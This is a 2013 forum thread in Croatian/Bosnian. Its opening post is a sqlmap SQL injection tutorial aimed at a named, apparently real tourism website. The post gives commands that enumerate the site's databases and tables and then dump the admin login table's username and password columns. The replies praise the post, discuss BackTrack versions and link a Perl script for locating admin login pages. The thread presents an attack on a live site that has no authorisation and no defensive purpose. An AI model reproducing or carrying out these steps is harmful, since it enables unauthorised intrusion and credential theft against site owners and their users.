SQLi tutorial

View previous topic View next topic Go down

SQLi tutorial

Post by Gost on Tue Jun 18, 2013 12:51 pm

Za sql injection ćemo koristiti program imena SQLmap koji se pokreće iz linux operativnog sistema, točnije backtrack5.
Prvo trebamo pronaći stranicu koja je ranjiva na sql napad a kao primjer sam odabrao:

http://www.latintourdimensions.com/overview/product_detail.php?id=86'

Dakle, otvorimo sqlmap;



Kada smo otvorili sqlmap vrijeme je da krenemo dalje, tako da upisujemo 1. naredbu:

python sqlmap.py -u (url) --dbs




Stisnemo enter da bi nam se izlistale baze podataka:



Sad imamo 2 baze podataka, nama je intresantna LTD, tako da je sljedeća naredba:
python sqlmap.py -u (url) -D (database) --tables





Sada ćemo odabrati AdminLogin table, nemora nužno biti isti naziv kada ćete vi to pokušavati, može biti: Users, Admin, LoginInformation...
Dakle sljedeća naredba glasi:
python sqlmap.py -u (url) -D (database) -T AdminLogin --columns
I dobrivamo username i pwd kao što slika i pokazije:



Da bi dobili sada password i username upisujemo naredbe:
python sqlmap.py -u (url) -D (database) -T AdminLogin -C passw --dump
i
python sqlmap.py -u (url) -D (database) -T AdminLogin -C usuairo --dump
Svaka od naredbi se upisuje zasebno.





Kao što vidimo iz slika pokazuje nam se usuairo (username) kao user isto tako vrijedi i za password.

To je to od mene za sad, sretno svima !!! Twisted Evil

Gost
Guest


Back to top Go down

Re: SQLi tutorial

Post by Gost on Tue Jun 18, 2013 11:01 pm

Vrlo koristan tutorijal,hvala sto si to podijelio s nama Smile

Gost
Guest


Back to top Go down

Re: SQLi tutorial

Post by Gost on Wed Jun 19, 2013 7:10 am

Hvala, na žalost puno ljudi pa ni ja neznamo sve tako da bi bilo dobro da svako napiše pokoji tutorial kako bi se stigli pripremiti za nadolazeće dane.

Gost
Guest


Back to top Go down

Re: SQLi tutorial

Post by buba on Wed Jun 19, 2013 8:21 pm

Prvo treba netko objasnit ovima sto neznaju za backtrack sta je to i to.. Wink

buba
Alpha
Alpha

Broj postova : 10
Join date : 2013-06-13

Back to top Go down

Re: SQLi tutorial

Post by meris on Fri Jun 21, 2013 1:26 am

Ovaj jeli ovo BackTrack 5 ili r2 ili r3 ß

meris
Alpha
Alpha

Broj postova : 9
Join date : 2013-06-15

Back to top Go down

Re: SQLi tutorial

Post by Gost on Fri Jun 21, 2013 4:19 am

ovo je  backtrack 5r1

Gost
Guest


Back to top Go down

Re: SQLi tutorial

Post by Krazee on Fri Jun 21, 2013 11:01 am

Za ovo i ne treba BackTrack, skineš Python, skineš SQLMap, pokreneš preko Python-a i pratiš ovaj tutorijal.

Btw. SQLMap > Havij

Krazee
Alpha
Alpha

Broj postova : 20
Join date : 2013-06-21
Age : 21

Back to top Go down

Re: SQLi tutorial

Post by MedioNNN on Sun Jun 30, 2013 7:52 am

a evo i perl skripta za trazenje admin login stranice na sajtu,http://www.sendspace.com/file/ir9dds

MedioNNN
Alpha
Alpha

Broj postova : 5
Join date : 2013-06-29

Back to top Go down

Re: SQLi tutorial

Post by Sponsored content Today at 7:02 am


Sponsored content


Back to top Go down

View previous topic View next topic Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum